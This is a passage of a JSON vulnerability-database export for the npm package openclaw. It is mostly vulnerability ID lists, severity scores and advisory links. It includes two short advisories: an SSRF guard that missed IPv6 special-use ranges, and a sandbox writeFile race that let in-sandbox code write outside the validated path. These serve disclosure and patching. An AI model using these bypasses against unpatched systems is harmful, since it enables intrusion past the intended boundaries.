fg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41374","GHSA-hhff-fj5f-qg48"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-axp9-mt9z-gkgw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91346?format=json","vulnerability_id":"VCID-aye6-1fwu-nkc5","summary":"OpenClaw SSRF guard misses four IPv6 special-use ranges\n## Summary\n\nThe SSRF/IP classifier treated several IPv6 special-use ranges as public and allowed fetches to proceed.\n\n## Impact\n\nAn attacker who controlled a fetched URL could target internal or non-routable IPv6 addresses that should have been blocked by the SSRF guard.\n\n## Affected Component\n\n`src/shared/net/ip.ts, src/infra/net/ssrf.*`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `d61f8e5672` (`Net: block missing IPv6 special-use ranges`).\n\nOpenClaw thanks @nicky-cc  of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d61f8e56723e03573b847422468d99c44c26e34f","reference_id":"","reference_type":"","scores":[{"value":"3.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d61f8e56723e03573b847422468d99c44c26e34f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g86v-f9qv-rh6m","reference_id":"","reference_type":"","scores":[{"value":"3.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g86v-f9qv-rh6m"},{"reference_url":"https://github.com/advisories/GHSA-g86v-f9qv-rh6m","reference_id":"GHSA-g86v-f9qv-rh6m","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g86v-f9qv-rh6m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-g86v-f9qv-rh6m"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aye6-1fwu-nkc5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90794?format=json","vulnerability_id":"VCID-b7hq-mrhg-b3bk","summary":"OpenClaw: Sandbox `writeFile` commit could race outside the validated path\n## Summary\nIn affected versions of `openclaw`, the sandbox fs-bridge `writeFile` commit step used an unanchored container path during the final move into place. An attacker racing parent-path changes inside the sandbox could redirect the committed file outside the validated sandbox path.\n\n## Impact\nThis is a sandbox boundary bypass. In-sandbox code could win a time-of-check-time-of-use race and cause host-approved `writeFile` operations to land outside the validated writable path within the container mount namespace.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.11`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe hardening work for anchored remove, rename, and mkdir operations did not fully cover the `writeFile` commit path. The final `mv` still used the raw target path, leaving a race window between safety revalidation and the in-container commit step.\n\n## Fix\nOpenClaw now anchors the `writeFile` commit path to the canonical parent directory before the final move. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32977","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0317","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03265","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03256","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32977"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xvx8-77m6-gwg6","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T13:28:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xvx8-77m6-gwg6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32977","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32977"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-boundary-bypass-via-unanchored-writefile-commit-path","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T13:28:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-boundary-bypass-via-unanchored-writefile-commit-path"},{"reference_url":"https://github.com/advisories/GHSA-xvx8-77m6-gwg6","reference_id":"GHSA-xvx8-77m6-gwg6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xvx8-77m6-gwg6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VC